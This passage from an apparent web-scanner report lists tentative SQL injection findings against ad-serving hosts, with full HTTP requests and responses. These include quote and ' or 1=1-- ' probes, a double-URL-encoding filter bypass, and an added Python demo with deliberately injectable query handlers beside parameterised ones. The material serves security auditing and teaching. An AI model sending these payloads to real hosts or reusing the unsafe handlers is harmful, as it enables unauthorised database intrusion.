[#!%Bbn~!#W(2)HM3<!wVd.!%l4g!!j:k!'H85~~~~~<n!/j<n<(e!!!#G!#mPD!-I0R!$Khv!0L[#!%Bbn~!#W(2)HM3<!wVd.!%l4g!!j:k!'H85~~~~~<n!/j<n<(e!!!#G!#mPG!-I0R!$Khv!0L[#!%Bbn~!#W(2)HM3<!wVd.!%l4g!!j:k!'H85~~~~~<n!/j<n<(e!!!#G!#mPJ!-I0R!$Khv!0L[#!%Bbn~!#W(2)HM3<!wVd.!%l4g!!j:k!'H85~~~~~<n!/j<n<(e!!!#G!!iIx!-nK4!$Uo!!0ER1!%G-L!!!!$!?5%!%R8]5!ZZ<)!'%'p!'MyD~~~~~~<miT1~M.jTN!#p!r!-I0R!$Khv!0L[#!%Bbn~!#W(2)HM3<!wVd.
!%l4g!!j:k!'H85~~~~~<n!/j<n!Ey!!.vL!#p!u!-I0R!$Khv!0L[#!%Bbn~!#W(2)HM3<!wVd.!%l4g!!j:k!'H85~~~~~<n!/j<n!Ey!!.vL"; lifb=ck5e5rukLFjg_W2; bh="b!!!%1!!$ha!!?fS<mZsO!!'iQ!!!!#<htUa!!*$n!!!!#<htUa!!*10!!!!%<m#np!!,D(!!!!'<m#np!!-?2!!!!*<m#np!!-G2!!!!$<lise!!-yu!!!!%<hu%6!!.+B!!!!%<hu%:!!0!j!!!!)<m#np!!0+@!!!!$<jb`/!!04a!!!!$<jb`/!!1CD!!!!'<mjPP!!1Mv!!!!#<hfYB!!1SP!!!!$<ie@u!!2(x!!!!(<m#np!!2)5!!!!#<m#np!!4<u!!!!)<m#np!!4d6!!!!#<jbN=!!5i*!!!!#<himW!!7gK!!!!#<lm]6!!<@x!!!!%<lSWC!!<P5!!!!#<m#np!!<P6!!!!#<m#np!!?VS!!DPb<lQiA!!C5(!!!!#<m#np!!J>N!!!!#<k2yx!!KNF!!ErC<k0fB!!L(*!!!!#<h67=!!L(^!!!!'<m8qE!!L_w!!!!+<m8qE!!MZU!!!!#<lQiC!!MfS!!!!$<mj`y!!Mr(!!ErC<k0fB!!ObA!!!!$<m#np!!ObV!!!!$<m#np!!OgU!!!!(<m#np!!T[J!!!!$<lm]6!!Z-E!!!!$<m#np!!Z-G!!!!$<m#np!!Z-L!!!!$<m#np!!Zw`!!!!%<m#np!!Zwb!!!!'<m#np!!`Yp!!!!#<htUb!!fP+!!!!#<k`g7!!g[x!!!!#<m#np!!hqJ!!!!#<lP]!!!iEC!!!!'<m#np!!iEb!!!!)<m#np!!i_9!!!!$<m#np!!jD6!!!!#<lja'!!mDJ!!!!#<lQq8!!p.C!!!!$<n!1B!!qOs!!!!#<htUb!!qOt!!!!#<htUb!!qOu!!!!#<htUb!!qu+!!!!$<lmXb!!r-X!!!!#<iMv0!!s6R!!!!#<htUb!!s9!!!!!#<jc#c!!ti>!!!!#<m!S_!!u[u!!!!(<lVbU!!utd!!!!(<lVbU!!utl!!!!#<lSD*!!uto!!!!#<lVbU!!uu)!!!!%<lSVZ!!v:e!!!!(<m#np!!y]X!!!!#<k11E!!ys+!!!!$<h2ED!#!vF!!!!#<m*gT!#!vL!!!!#<m*gT!###G!!!!#<lP[k!###_!!!!#<j?lI!##lo!!!!#<jbO@!#')-!!!!#<k2yx!#*<R!!!!%<ln'v!#*VS!!!!#<jLPe!#+]S!!!!(<m#np!#,##!!!!'<lSWC!#-vv!!!!$<iC/K!#.dO!!!!+<m8qE!#/:a!!!!$<lmXf!#/G2!!!!$<m#np!#/G<!!!!$<m#np!#/GO!!!!$<m#np!#/j>!!!!#<m*gT!#/yX!!!!#<k2yx!#0$b!!!!%<hu%0!#15#!!ErC<k0fB!#15$!!ErC<k0fB!#17@!!?fS<mZsO!#2+>!!!!'<lS0M!#2Ic!!!!$<mj`x!#2`q!!!!#<jc#g!#2mR!!!!$<lEIO!#3(M!!!!#<m*gT!#3>,!!!!#<lmWu!#3>9!!!!#<lxx`!#3>C!!!!#<lxx]!#3>M!!!!#<lmdr!#3pS!!!!$<lR(Q!#3pv!!!!$<lP]%!#5(U!!!!#<myyA!#5(X!!!!#<jLPe!#5(Y!!!!#<l.yn!#5(f!!!!#<kI4S!#5m!!!!!#<k2yx!#5mH!!!!#<k2yx!#6Ty!!!!#<myyA!#7(x!!!!*<m#np!#8*^!!!!#<mC=k!#8.'!!!!$<lmXe!#8:i!!!!#<jc#c!#8?7!!!!$<lmXb!#8A2!!!!#<k11E!#<T3!!!!#<jbNC!#@7F!!!!#<m8qE!#@wb!!!!#<m*gT!#CC>!!!!#<lS@,!#F1H!!!!'<lS0M!#FGA!!!!%<ln'v!#Fu6!!!!$<lm]6!#Fw_!!!!%<ln'v!#I=D!!!!
,<m915!#Ic1!!!!$<lmXc!#Ie+!!!!#<myyA!#K?%!!!!#<l8V)!#Kbb!!!!#<jLP/!#LI/!!!!$<mjPP!#LI0!!!!#<k2yw!#LaM!!!!#<m,_i!#MAX!!!!#<mjra!#MTC!!!!-<m9Vb!#MTF!!!!-<m9Vb!#MTH!!!!-<m9Vb!#MTI!!!!-<m9Vb!#MTJ!!!!-<m9Vb!#Mub!!!!#<myyA!#NjS!!!!#<lI#*!#O4F!!!!#<m*gT!#O4I!!!!#<m*gT!#O4M!!!!#<m*gT!#O>M!!DPb<lQiA!#OAV!!DPb<lQiA!#OAW!!DPb<lQiA!#OC2!!!!#<l/M+!#OH-!!!!#<m*gT!#PqQ!!!!#<lI#)!#PrV!!!!$<myyF!#Q*7!!!!#<n!1O!#Q+o!!!!+<m8qE!#Q<o!!!!#<mC=k!#Qh8!!!!#<l.yn!#R!r!!!!#<myyA!#RSx!!!!#<m*gT!#Ri/!!!!+<m8qE!#Rij!!!!+<m8qE!#SCj!!!!%<m*l:!#SCk!!!!(<m8qG!#SUp!!!!(<m#np!#SVp!!!!#<m*gT!#T#d!!!!#<k2yx!#T,d!!!!#<lR(Q!#TlE!!!!$<lmXe!#TnE!!!!*<m9Vb!#Tnp!!!!$<lmXb!#UDQ!!!!-<m9Vb!#UJ4!!!!#<m*gT!#UJ9!!!!#<m*gT!#UL(!!!!%<lQW%!#V7#!!!!#<myyA!#VYG!!!!(<mCr1!#V]o!!!!%<mCr1!#V]u!!!!'<mCr1!#V]v!!!!'<mCr1!#W,W!!!!'<mCr1!#W-B!!!!%<mCr1!#W-^!!!!%<mCr1!#W.*!!!!'<mCr1!#W.B!!!!#<m*XR!#W.Q!!!!'<mCr1!#W/5!!!!'<mCr1!#W/A!!!!'<mCr1!#W/J!!!!$<m:Vy!#W^8!!!!#<jem(!#Wb2!!DPb<lQiA!#X)y!!!!#<jem(!#X:Z!!!!#<m*gT!#X]+!!!!'<kdT!!#Zb%!!!!#<m#np!#ZbF!!!!#<m#np!#ZbM!!!!#<m#np!#ZhT!!!!*<m#np!#Zmf!!!!$<kT`F!#[25!!!!%<lhqW!#[L>!!!!%<lise!#]%`!!!!$<m*Yw!#]Z#!!!!#<m#np!#^$?!!!!#<m*gT!#^0$!!!!(<m#np!#^0%!!!!(<m#np!#^d6!!!!$<m*Yw!#_+6!!!!#<m*gT!#_0t!!!!%<kTb(!#_1L!!!!#<m*gT!#`T=!!!!#<m#np!#`T>!!!!#<m#np!#`TF!!!!#<m#np!#`TG!!!!#<m#np!#`TJ!!!!#<m#np!#`TK!!!!#<m#np!#aCq!!!!'<lisd!#aG>!!!!+<m8qE!#aM'!!!!#<kp_p!#aly!!!!#<m*gT!#av4!!!!$<m!TH!#b<d!!!!#<jLPi!#b<e!!!!#<l.yn!#b<g!!!!#<kI4S!#b<i!!!!#<jLPe!#b<j!!!!#<jHAu!#b?A!!!!#<l.x@!#b`>!!!!#<jc#Y!#b`?!!!!#<jc#Y!#b`@!!!!#<jc#Y!#cC!!!!!#<ie2`!#dCU!!!!#<m*gT!#e)`!!!!#<m:W!!#e@W!!!!#<k_2)!#eVe!!!!#<jHAu!#elE!!!!#<k3!!!#f$g!!!!%<mh@e!#fBj!!!!)<m#np!#fBk!!!!)<m#np!#fBm!!!!)<m#np!#fBn!!!!)<m#np!#fE=!!!!'<lQj,!#fG+!!!!)<m#np!#fJ/!!!!#<gj@R!#fdu!!!!#<k2yx!#fpW!!!!#<l/JY!#fpX!!!!#<l/JY!#fpY!!!!#<l/JY!#g/7!!!!(<m#np!#gC:!!!!#<lmdV!#gHO!!!!#<m*gT!#gPp!!!!#<m!TX!#gRx!!!!#<htU3!#g]5!!!!#<lm]?!#g]7!!!!#<l.yn!#g]9!!!!#<kjl4!#gq`!!!!#<m*gT!#h.N!!!!#<kL2n!#jRq!!!!#<mZv)!#jS>!!!!#<k_Jy!#mP5!!!!$<lise!#mP6!!!!$<lis
e!#ndJ~~!#ndP!!!!$<lP]'!#ne$!!!!$<lP]'!#p7'!!!!#<myyA!#p9d!!!!#<lj09!#pD8!!!!+<n!/j!#q?L!!!!#<mjrb!#rJ)!!!!#<mn#6!#sXy!!!!#<n!/o!#so_!!!!#<mjPP!#sx#!!!!3<m9Vd!#t?S!!!!#<m`73"

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 15:04:17 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: ad0118.rm.ac4
Cache-Control: no-store
Last-Modified: Mon, 14 Feb 2011 15:04:17 GMT
Pragma: no-cache
Content-Length: 1103
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

document.write('<iframe allowtransparency=\"true\" scrolling=\"no\" marginwidth=\"0\" marginheight=\"0\" frameborder=\"0\" height=\"90\" width=\"728\" src=\"http://adserving.cpxinteractive.com/iframe3?INNLAIrDDgAuX3cAAAAAAHRtHgAAAAAAAwAAAAYAAAAAAP8AAAACCvNjGwAAAAAAPBsoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADWRAgAAAAAAAIAAgAAAAAAAAAAAAAAAAABAPBxXtORPwAAAAAAAAAAAQCQaJ21nT8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC15Rm18SiiCfELaflJ4lS0Dsptv5K.DRbGbhwkAAAAAA==,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F216%2Fus%2F728x90%2Fnews%3Ft%3D1297647385452%26tz%3D360%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.independent.co.uk%252fnews%252fworld%252fafrica%252fis-the-army-tightening-its-grip-on-egypt-2213849.html%26refer%3D,Z%3D728x90%26s%3D967562%26_salt%3D946042951%26B%3D10%26r%3D014513687%2520or%25201%253d2--%2520,b1863a78-384b-11e0-b4dc-001b24936094\"></iframe>');
var rm_data = new Object();
rm_data.creative_id = 7823150;
rm_data.offer_type = 31;
rm_data.entity_id = 362142;
if (window.rm_crex_data) {rm_crex_data.push(7823150);}

1.2. http://ads.asp.net/a.aspx [%24CC cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ads.asp.net
Path:   /a.aspx

Issue detail

The %24CC cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the %24CC cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. The error returned here is a .NET NullReferenceException ("Object reference not set to an instance of an object."), not a database error message, so the single quote may be breaking a lookup or parse of the cookie value elsewhere in the code rather than a SQL statement; the stack trace in the full 500 response is where to settle that.

Request 1

GET /a.aspx?ZoneID=456&Task=Get&IFR=False&Browser=NETSCAPE4&PageID=69670&SiteID=3&Random=1297695837986 HTTP/1.1
Host: ads.asp.net
Proxy-Connection: keep-alive
Referer: http://ads.asp.net/a.aspx?ZoneID=443&Task=Get&PageID=77047&SiteID=3
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=rqfwaq45hoecdc55iodweli3; %24SPIDER=False; %24CC=US'; %24RC=TX; %24MC=0

Response 1

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 14 Feb 2011 15:08:45 GMT
Content-Length: 4587

<html>
<head>
<title>Object reference not set to an instance of an object.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
...[SNIP]...
</b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br>
...[SNIP]...

Request 2

GET /a.aspx?ZoneID=456&Task=Get&IFR=False&Browser=NETSCAPE4&PageID=69670&SiteID=3&Random=1297695837986 HTTP/1.1
Host: ads.asp.net
Proxy-Connection: keep-alive
Referer: http://ads.asp.net/a.aspx?ZoneID=443&Task=Get&PageID=77047&SiteID=3
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=rqfwaq45hoecdc55iodweli3; %24SPIDER=False; %24CC=US''; %24RC=TX; %24MC=0

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-javascript; charset=utf-8
Server: Microsoft-IIS/7.0
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 14 Feb 2011 15:08:46 GMT
Content-Length: 1449

document.write('<!-- Begin - Site: TheLounge Network Zone: TL_RON_728_ITPro -->\r<script language=\"javascript\" type=\"text/javascript\">\r<!--\rvar browName = navigator.appName;\rvar SiteID = 6;\r
...[SNIP]...
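The remediation guidance above and the two checks the scanner applied in 1.1 (the " or 1=1-- " versus " or 1=2-- " difference test) and in 1.2 and 1.3 (a single quote that triggers an error, a doubled quote that does not), replayed as an added example. This is not part of the report and not code from any host listed in it: the in-memory SQLite table, the concatenating and parameterised handlers, and the rotating handler that runs no SQL at all are constructed stand-ins, and the creative ids are borrowed from the findings only to make the output recognisable.

```python
import itertools
import sqlite3

# Constructed stand-in for an ad server's creative table (not data from the report).
CREATIVES = [
    (14513687, "US", "<a ...><img ...></a>"),   # id borrowed from the 1.1 payload
    (7823150, "TX", "<iframe ...></iframe>"),  # rm_data.creative_id seen in 1.1, response 2
    (42801041, "GB", "<img ...>"),             # id borrowed from the 1.4 payload
]


def make_db():
    """Build an in-memory SQLite database holding the constructed creatives."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE creative (id INTEGER PRIMARY KEY, region TEXT, html TEXT)")
    conn.executemany("INSERT INTO creative VALUES (?, ?, ?)", CREATIVES)
    return conn


def by_id_concat(conn, r):
    """Unsafe handler: the r parameter is spliced straight into the query text."""
    sql = "SELECT id FROM creative WHERE id = " + r
    return [row[0] for row in conn.execute(sql)]


def by_region_concat(conn, cc):
    """Unsafe handler: the cookie value is quoted and spliced in; a stray ' ends the literal early."""
    sql = "SELECT id FROM creative WHERE region = '" + cc + "'"
    return [row[0] for row in conn.execute(sql)]


def by_id_param(conn, r):
    """Parameterised handler: the structure is fixed before r is bound, so r is only ever a value."""
    return [row[0] for row in conn.execute("SELECT id FROM creative WHERE id = ?", (r,))]


def by_region_param(conn, cc):
    """Parameterised handler for the cookie-driven lookup."""
    return [row[0] for row in conn.execute("SELECT id FROM creative WHERE region = ?", (cc,))]


_rotation = itertools.cycle(CREATIVES)


def by_rotation(conn, r):
    """Control handler with no SQL at all: hands out the next creative regardless of r,
    the way an ad rotator does. Used to show how the difference test misfires."""
    return [next(_rotation)[0]]


def boolean_probe(handler, conn, base):
    """The 1.1 check: submit '<base> or 1=1-- ' and '<base> or 1=2-- ' (the decoded
    %20or%201%3d1--%20 payloads) and report whether the two results differ."""
    true_branch = handler(conn, base + " or 1=1-- ")
    false_branch = handler(conn, base + " or 1=2-- ")
    return true_branch != false_branch


def quote_probe(handler, conn, base):
    """The 1.2/1.3 check: a single quote should raise a database error and a doubled
    quote should not. Returns True only when both halves of that pattern hold."""
    def raises(value):
        try:
            handler(conn, value)
        except sqlite3.Error:
            return True
        return False
    return raises(base + "'") and not raises(base + "''")


def run_all():
    """Run the matching probe against every handler; returns {handler name: flagged?}."""
    conn = make_db()
    results = {}
    for handler in (by_id_concat, by_id_param, by_rotation):
        results[handler.__name__] = boolean_probe(handler, conn, "14513687")
    for handler in (by_region_concat, by_region_param):
        results[handler.__name__] = quote_probe(handler, conn, "US")
    return results


if __name__ == "__main__":
    for name, flagged in run_all().items():
        print(f"{name:18s} flagged={flagged}")
```

The rotating handler is flagged by the difference test even though it never touches a database, which is the false-positive mode the 1.1 finding warns about. The parameterised handlers are flagged by neither probe: the payload is compared as an opaque value, so " or 1=1-- " matches no row and a lone quote is just a character in a string.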

1.3. http://ads.asp.net/a.aspx [%24RC cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ads.asp.net
Path:   /a.aspx

Issue detail

The %24RC cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the %24RC cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. As with the %24CC cookie in 1.2, the error is a .NET NullReferenceException rather than a database error message, and the same 4587-byte error page is returned for both cookies, so treat this as one behaviour to investigate via the stack trace rather than two confirmed injection points.

Request 1

GET /a.aspx?ZoneID=456&Task=Get&IFR=False&Browser=NETSCAPE4&PageID=69670&SiteID=3&Random=1297695837986 HTTP/1.1
Host: ads.asp.net
Proxy-Connection: keep-alive
Referer: http://ads.asp.net/a.aspx?ZoneID=443&Task=Get&PageID=77047&SiteID=3
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=rqfwaq45hoecdc55iodweli3; %24SPIDER=False; %24CC=US; %24RC=TX'; %24MC=0

Response 1

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 14 Feb 2011 15:08:55 GMT
Content-Length: 4587

<html>
<head>
<title>Object reference not set to an instance of an object.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
...[SNIP]...
</b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br>
...[SNIP]...

Request 2

GET /a.aspx?ZoneID=456&Task=Get&IFR=False&Browser=NETSCAPE4&PageID=69670&SiteID=3&Random=1297695837986 HTTP/1.1
Host: ads.asp.net
Proxy-Connection: keep-alive
Referer: http://ads.asp.net/a.aspx?ZoneID=443&Task=Get&PageID=77047&SiteID=3
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=rqfwaq45hoecdc55iodweli3; %24SPIDER=False; %24CC=US; %24RC=TX''; %24MC=0

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-javascript; charset=utf-8
Server: Microsoft-IIS/7.0
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 14 Feb 2011 15:08:56 GMT
Content-Length: 1449

document.write('<!-- Begin - Site: TheLounge Network Zone: TL_RON_728_ITPro -->\r<script language=\"javascript\" type=\"text/javascript\">\r<!--\rvar browName = navigator.appName;\rvar SiteID = 6;\r
...[SNIP]...

1.4. http://c5.zedo.com//ads2/k/889025/4381/172/0/305004506/305004506//0/305/916//1000003/i.js [REST URL parameter 11]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://c5.zedo.com
Path:   //ads2/k/889025/4381/172/0/305004506/305004506//0/305/916//1000003/i.js

Issue detail

The REST URL parameter 11 appears to be vulnerable to SQL injection attacks. The payloads 42801041%20or%201%3d1--%20 and 42801041%20or%201%3d2--%20 were each submitted in the REST URL parameter 11. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET //ads2/k/889025/4381/172/0/305004506/305004506//0/305/91642801041%20or%201%3d1--%20//1000003/i.js HTTP/1.1
Host: c5.zedo.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=305;c=4506/2941/1;s=916;d=17;w=720;h=300
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=305,4506,17:1120,1,9; FFad=0:0

Response 1

HTTP/1.1 200 OK
Server: ZEDO 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Vary: Accept-Encoding
Content-Type: application/x-javascript
X-Varnish: 1729344673
Cache-Control: max-age=2592000
Expires: Wed, 16 Mar 2011 14:42:47 GMT
Date: Mon, 14 Feb 2011 14:42:47 GMT
Connection: close
Content-Length: 2165


var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd =='undefined'){var zzIdxTrd ='';}
e
...[SNIP]...
</A>")

Request 2

GET //ads2/k/889025/4381/172/0/305004506/305004506//0/305/91642801041%20or%201%3d2--%20//1000003/i.js HTTP/1.1
Host: c5.zedo.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=305;c=4506/2941/1;s=916;d=17;w=720;h=300
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=305,4506,17:1120,1,9; FFad=0:0

Response 2

HTTP/1.1 200 OK
Server: ZEDO 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Vary: Accept-Encoding
Content-Type: application/x-javascript
X-Varnish: 269055336
Cache-Control: max-age=2591996
Expires: Wed, 16 Mar 2011 14:42:43 GMT
Date: Mon, 14 Feb 2011 14:42:47 GMT
Connection: close
Content-Length: 2529


var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd =='undefined'){var zzIdxTrd ='';}
e
...[SNIP]...
</A>")
var zzllnw = new Image();
var zzxads = new Image();
if ((Math.floor(Math.random()*1000000)%9)==0) {
zzllnw.src='http://l1.zedo.com/log/p.gif?a=27536;c=101000000;x=3840;n=101;e=i;i=0;s=0;z='+Math.random()+';logdomain=l1.zedo.com';
zzxads.src='http://xads.zedo.com/ads2/p/l?a=27535;c=101000000;x=3840;n=101;e=i;i=0;s=0;z='+Math.random()+';logdomain=l1.zedo.com';
}
1.5. http://googleads.g.doubleclick.net/pagead/ads [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

